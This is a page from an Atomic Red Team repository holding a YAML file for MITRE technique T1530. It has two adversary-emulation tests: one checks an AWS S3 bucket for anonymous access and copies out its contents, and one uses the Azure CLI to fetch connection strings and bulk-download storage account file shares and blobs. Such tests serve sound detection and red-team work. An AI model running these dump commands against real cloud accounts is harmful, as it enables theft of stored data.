security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1530/T1530.yaml
T

122 lines
6.7 KiB
YAML
Raw Permalink Blame History

attack_technique: T1530
display_name: Data from Cloud Storage Object
atomic_tests:
- name: AWS - Scan for Anonymous Access to S3
auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5
description: |
Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder.
supported_platforms:
- iaas:aws
input_arguments:
s3_bucket_name:
description: Name of the bucket
type: string
default: "redatomic-test2"
dependencies:
- description: |
Check if ~/.aws/credentials file has a default stanza is configured
prereq_command: |
cat ~/.aws/credentials | grep "default"
aws s3api create-bucket --bucket #{s3_bucket_name}
aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json
touch /tmp/T1530.txt
aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name}
get_prereq_command: |
echo Please install the aws-cli and configure your AWS default profile using: aws configure
executor:
command: |
aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name}
cleanup_command: |
aws s3 rb s3://#{s3_bucket_name} --force
rm -rf /tmp/#{s3_bucket_name}
name: sh
elevation_required: false
- name: Azure - Dump Azure Storage Account Objects via Azure CLI
auto_generated_guid: 67374845-b4c8-4204-adcc-9b217b65d4f1
description: |-
This test dumps the content of the storage account objects present in the file defined in file_shares_csv_file_path. Note that this file is created in the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup","StorageAccountName", "FileShareName", "ContainerName", "BlobName".
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
supported_platforms:
- iaas:azure
input_arguments:
output_folder:
type: path
default: $env:temp\T1530_storage_account_objects
description: Folder path to output file share content to
storage_account_objects_csv_file_path:
type: path
default: $env:temp\T1619_storage_account_objects.csv
description: Path to file that contains all storage account objects in form of a csv file. This may be the result from Test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI".
dependency_executor_name: powershell
dependencies:
- description: Azure CLI must be installed
prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
get_prereq_command: Install-Module -Name Az -Force
executor:
command: |-
$storage_account_objects = Import-Csv -Path "#{storage_account_objects_csv_file_path}"
# Login to Azure
az login
if (-not (Test-Path -Path "#{output_folder}")) {
New-Item -ItemType Directory -Path "#{output_folder}"
}
foreach ($row in $storage_account_objects) {
if ($row.FileShareName -ne ""){
$allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess"
if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null
Write-Output "Shared key access is disabled for this storage account."
} else {
Write-Output "Fetching content from file share: $($row.FileShareName) in storage account $($row.StorageAccountName) ..."
$connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
# Create folder for storage account objects
$storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)"
if (-not (Test-Path -Path $storageAccountOutputPath)) {
New-Item -ItemType Directory -Path $storageAccountOutputPath
}
# create folder for file share content
$fileSharePath = Join-Path -Path $storageAccountOutputPath $row.FileShareName
if (-not (Test-Path -Path $fileSharePath)) {
New-Item -ItemType Directory -Path $fileSharePath
}
az storage file download-batch --connection-string $connectionString --source $row.FileShareName --destination $fileSharePath
}
} elseif ($row.ContainerName -ne "" -and $row.BlobName -eq "") {
$allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess"
if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null
Write-Output "Shared key access is disabled for this storage account."
} else {
Write-Output "Fetching all blobs from container $($row.ContainerName) in storage account $($row.StorageAccountName) ..."
$connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
# Create folder for storage account objects
$storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)"
if (-not (Test-Path -Path $storageAccountOutputPath)) {
New-Item -ItemType Directory -Path $storageAccountOutputPath
}
# create folder for blob content
$containerFolderPath = Join-Path $storageAccountOutputPath $row.ContainerName
if (-not (Test-Path -Path $containerFolderPath)) {
New-Item -ItemType Directory -Path $containerFolderPath
}
az storage blob download-batch --destination $containerFolderPath --source $row.ContainerName --connection-string $connectionString
}
}
}
cleanup_command: |-
Remove-Item -Path "#{output_folder}" -Recurse -Force -erroraction silentlycontinue
Write-Output "Removed #{output_folder}"
name: powershell
elevation_required: false
Reference in New Issue View Git Blame Copy Permalink